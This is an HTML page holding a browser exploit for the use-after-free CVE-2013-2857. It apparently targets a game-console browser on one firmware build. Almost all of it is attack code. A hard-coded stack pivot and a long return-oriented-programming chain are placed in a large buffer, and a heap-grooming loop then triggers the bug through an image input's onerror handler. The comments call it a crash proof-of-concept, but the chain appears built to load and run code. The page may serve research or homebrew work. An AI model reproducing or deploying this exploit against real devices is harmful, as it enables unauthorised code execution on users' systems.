<!--
Tested on 5.5.1
CVE-2013-2857
Use-after-free, tracked at https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: the bug is present; the page crashes
types=["checkbox","color","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"]
-->
<script>
/**
 * Crash proof-of-concept for the use-after-free named in the page header
 * (CVE-2013-2857). Fills a large backing buffer with hard-coded words at
 * fixed byte offsets, copies the `rop` word list into it, and then runs a
 * loop that allocates small buffers while reassigning the input element's
 * `type` attribute. Every numeric constant below is target-specific (the
 * page header says it was tested on one firmware build only) and is not
 * documented here beyond what the original inline comments state.
 *
 * @param {HTMLInputElement} a - the <input> element handed in from its
 *   onerror handler; the only property this function touches is `type`.
 * @returns {undefined}
 */
function UaF3(a)
{
	var bsize=0x2000000; // 32 MiB backing store; indices below are byte offsets divided by 4
	var p = new ArrayBuffer(bsize); 
	var payload = new Uint32Array(p);

	// Fixed words placed around byte offset 0x1ba000 (meanings per the original comments)
	payload[(0x1ba000+0x18)/4]=0x09300000;
	payload[(0x1ba000)/4]=0x09300000;
	payload[(0x1ba000+0x14c)/4]=0x00ac144c; //ldmdb r0!, {ip, sp, lr, pc} (stack pivot)
	payload[(0x1ba000-0x4)/4]=0x001df60c;	//POP_PC   (pivot pc)
	payload[(0x1ba000-0x8)/4]=0x44444444;	//GARBAGE  (lr)
	payload[(0x1ba000-0xC)/4]=0x09310000;	//ROP_ADDR (pivot sp)

	// Word list copied verbatim into `payload` by the first loop below;
	// produced by the generator linked in the inline comment.
	var rop=[  				/* Generated from: https://github.com/yellows8/3ds_browserhax_common */
		0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x0100FFFF,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x00202A04,0x09320000,
		0x00000004,0x00000000,0x00000000,0x00000000,0x00000000,0x00298304,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x00011000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00D1042C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x636D6473,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320004,
		0x0000003A,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00000000,0x00318D30,0x0026276C,0x00000000,0x0027B150,0x001DF7F0,0x001DF7F0,0x09320000,0x0A000000,0x00000000,0x00800000,0x00000000,0x00000000,0x00000000,0x002634DC,0x00000001,
		0x00000000,0x00000000,0x00000008,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x00000014,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00D1042C,0x0030C328,0x09320010,0x00640073,0x0063006D,0x002F003A,0x00720061,0x0031006D,0x00630031,0x0064006F,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,
		0x0932002C,0x002E0065,0x00690062,0x0000006E,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,
		0x09320040,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320040,0x00000001,0x00000000,0x00000000,
		0x00000000,0x00000000,0x003222E4,0x0026276C,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x09320000,0x09320020,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x0030C44C,
		0x0026276C,0x00000000,0x00296E64,0x09320000,0x0027B150,0x001DF60C,0x001F7A04,0x0027B150,0x001DF60C,0x001DCDD0,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x001EC780,
		0x0027B150,0x001DF60C,0x001DF7F0,0x3A45D000,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0029DADC,0x0030C328,0x09320010,0x00000000,0x001F1FAC,0x00000000,
		0x00000000,0x00000000,0x00000000,0x001EAAFC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x002A2498,0x0029DADC,0x003222E4,0x001EC780,0x001F1FDC,
		0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C000,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,
		0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x0030C44C,0x00327258,0x00298304,0x00000000,0x00000000,0x00000048,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,
		0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x003E03D0,0x00000114,0x00000000,0x00000000,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,
		0x001DF7F0,0x3A45C030,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,0x0030C328,0x09320010,0x00000000,0x3A45D000,0x0063A738,0x00D11044,0x00D10BA4,
		0x00D111B4,0x00D10BAC,0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0030C328,0x0932002C,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,
		0x00000000,0x0076E6CD,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3A45C060,0x09320010,0x00000030,0x00000000,0x00000000,0x00000000,0x00000000,0x00D1044C,
		0x0027B150,0x001DF7F0,0x001DF7F0,0x3A45D000,0x3B1336E0,0x00008000,0x00000000,0x00000000,0x00000000,0x00000000,0x002A2498,0x00000000,0x00000000,0x00000000,0x00000008,0x00000000,
		0x00000000,0x00000000,0x0027B150,0x001DF60C,0x001DF7F0,0x3B9ACA00,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x002D8CD4,0x0027B150,0x001DF60C,0x001DF7F0,
		0x09320000,0x01808080,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x00226C10,0x0027B150,0x001DF7F0,0x001DF7F0,0x00202A04,0x09320000,0x00000004,0x00000000,0x00000000,
		0x00000000,0x00000000,0x00298304,0x3A45C000,0x0FFF9000,0x00000000,0x00000000,0x00000000,0x00000000,0x00000000,0x0027B150,0x001DF60C,0x0055B6E0,0x70707070
	]

	// Copy `rop` one 32-bit word at a time, starting at byte offset 0x1ba000+0x10000.
	// `var i` is function-scoped, so this loop and the next share the same `i`.
	for(var i=0; i < rop.length; i++) payload[(0x1ba000+0x10000+(i*4))/4]=rop[i];
	
	// 1000 iterations: allocate a 0x18-byte buffer (six 32-bit words, so
	// index 5 is the last valid one), fill every word with a fixed value,
	// then reassign the input's type. The page header reports this as the
	// step that produces the crash.
	for(var i=0;i<1000;i++){
		var buf = new ArrayBuffer(0x18);
		var bufView = new Uint32Array(buf);
		bufView[0]=0x11131100;
		bufView[1]=0x09300000; //r5
		bufView[2]=0x39010018; //r6
		bufView[3]=0x44161400;
		bufView[4]=0xffffffff;
		bufView[5]=0x66181600;
		a.type="hidden";
	}
}
</script>
<input type="image" onerror="UaF3(this);" src=""/>